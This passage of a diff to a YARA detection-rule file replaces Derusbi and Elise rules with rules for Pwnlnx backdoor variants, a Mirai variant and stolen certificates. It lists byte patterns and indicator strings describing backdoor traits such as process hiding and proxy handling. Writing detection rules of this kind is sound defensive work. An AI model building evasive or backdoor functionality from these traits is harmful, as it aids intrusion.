"https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_elise_pdb.yar#L1-L29" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L67-L97" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b" - logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496" + hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75" + logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:W32/Elise" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb" - $pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb" - $pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb" - $pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb" - $pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb" + $bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? } condition: - uint16(0)==0x5a4d and filesize <50KB and any of them + uint16(0)==0x457f and filesize <4000KB and all of them } -rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE { meta: - description = "Rule to detect the APT Derusbi ELF file" + description = "Rule to detect the backdoor pwnlnx variant 4" author = "Marc Rivero | McAfee ATR Team" - id = "3b1c9644-7279-5e2c-8891-f03ca78cf3b7" - date = "2017-05-31" + id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0021/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L1-L61" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L99-L129" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "0a83566a0540d28d1cc0ebee01d29d15ddc86cabff9044fd8a198b847ba24c50" + hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc" + logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa" score = 75 - quality = 68 + quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:ELF/Derusbi" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "LxMain" - $s2 = "execve" - $s3 = "kill" - $s4 = "cp -a %s %s" - $s5 = "%s &" - $s6 = "dbus-daemon" - $s7 = "--noprofile" - $s8 = "--norc" - $s9 = "TERM=vt100" - $s10 = "/proc/%u/cmdline" - $s11 = "loadso" - $s12 = "/proc/self/exe" - $s13 = "Proxy-Connection: Keep-Alive" - $s14 = "Connection: Keep-Alive" - $s15 = "CONNECT %s" - $s16 = "HOST: %s:%d" - $s17 = "User-Agent: Mozilla/4.0" - $s18 = "Proxy-Authorization: Basic %s" - $s19 = "Server: Apache" - $s20 = "Proxy-Authenticate" - $s21 = "gettimeofday" - $s22 = "pthread_create" - $s23 = "pthread_join" - $s24 = "pthread_mutex_init" - $s25 = "pthread_mutex_destroy" - $s26 = "pthread_mutex_lock" - $s27 = "getsockopt" - $s28 = "socket" - $s29 = "setsockopt" - $s30 = "select" - $s31 = "bind" - $s32 = "shutdown" - $s33 = "listen" - $s34 = "opendir" - $s35 = "readdir" - $s36 = "closedir" - $s37 = "rename" + $bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883????5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? } condition: - ( uint32(0)==0x4464c457f) and filesize <200KB and all of them + uint16(0)==0x457f and filesize <400KB and all of them } -rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Kernelmodule : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE { meta: - description = "Rule to detect the Derusbi ELK Kernel module" + description = "Rule to detect the backdoor pwnlnx variant 6" author = "Marc Rivero | McAfee ATR Team" - id = "1614a63d-c5d1-5ce1-a5b8-eb48325f60e6" - date = "2017-05-31" + id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0021/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L63-L105" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L131-L161" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "0b86e96ef616e926f0d665e2bd013f2773461483176c68bd5e7c7d059ac13d78" + hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a" + logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:ELF/Derusbi" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "__this_module" - $s2 = "init_module" - $s3 = "unhide_pid" - $s4 = "is_hidden_pid" - $s5 = "clear_hidden_pid" - $s6 = "hide_pid" - $s7 = "license" - $s8 = "description" - $s9 = "srcversion=" - $s10 = "depends=" - $s11 = "vermagic=" - $s12 = "current_task" - $s13 = "sock_release" - $s14 = "module_layout" - $s15 = "init_uts_ns" - $s16 = "init_net" - $s17 = "init_task" - $s18 = "filp_open" - $s19 = "__netlink_kernel_create" - $s20 = "kfree_skb" + $bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? } condition: - ( uint32(0)==0x4464c457f) and filesize <200KB and all of them + uint16(0)==0x457f and filesize <700KB and all of them } -rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Sharedmemcreation : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE { meta: - description = "Rule to detect Derusbi Linux Shared Memory creation" + description = "Rule to detect the Mirai Casper variant" author = "Marc Rivero | McAfee ATR Team" - id = "8d2db62e-22fa-5bbe-ab65-f294fc911b82" - date = "2017-05-31" + id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0021/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L107-L130" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L163-L193" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "095af979728f3b71e3192140306e4aa76011e07a25b20b0c5b3b98db41411714" + hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300" + logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703" score = 75 quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:ELF/Derusbi" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 } + $bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85??74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? } condition: - ( uint32(0)==0x464C457F) and filesize <200KB and all of them + uint16(0)==0x457f and filesize <3000KB and all of them } -rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Strings : BACKDOOR FILE +import "pe" + +rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE { meta: - description = "Rule to detect APT Derusbi Linux Strings" + description = "Rule to detect samples digitally signed from these stolen certificates" author = "Marc Rivero | McAfee ATR Team" - id = "09e47580-9b20-5461-943e-32b932c36214" - date = "2017-05-31" + id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93" + date = "2020-04-17" modified = "2020-08-14" - reference = "https://attack.mitre.org/software/S0021/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_Derusbi.yar#L132-L173" + reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_decade_of_RATs.yar#L196-L221" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "0e95497c44a0c1d85936a6a072063720a771b7e1eb8da2377e54577e3fc2764e" + hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558" + logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160" score = 75 - quality = 68 + quality = 70 tags = "BACKDOOR, FILE" rule_version = "v1" malware_type = "backdoor" - malware_family = "Backdoor:ELF/Derusbi" + malware_family = "Backdoor:W32/Pwnlnx" actor_type = "Cybercrime" actor_group = "Unknown" - strings: - $a1 = "loadso" wide ascii fullword - $a2 = "\nuname -a\n\n" wide ascii - $a3 = "/dev/shm/.x11.id" wide ascii - $a4 = "LxMain64" wide ascii nocase - $a5 = "# \\u@\\h:\\w \\$ " wide ascii - $b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide - $b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide - $b3 = "ret %d" wide fullword - $b4 = "uname -a\n\n" wide ascii - $b5 = "/proc/%u/cmdline" wide ascii - $b6 = "/proc/self/exe" wide ascii - $b7 = "cp -a %s %s" wide ascii - $c1 = "/dev/pts/4" wide ascii fullword - $c2 = "/tmp/1408.log" wide ascii fullword - condition: - uint32(0)==0x464C457F and filesize <200KB and 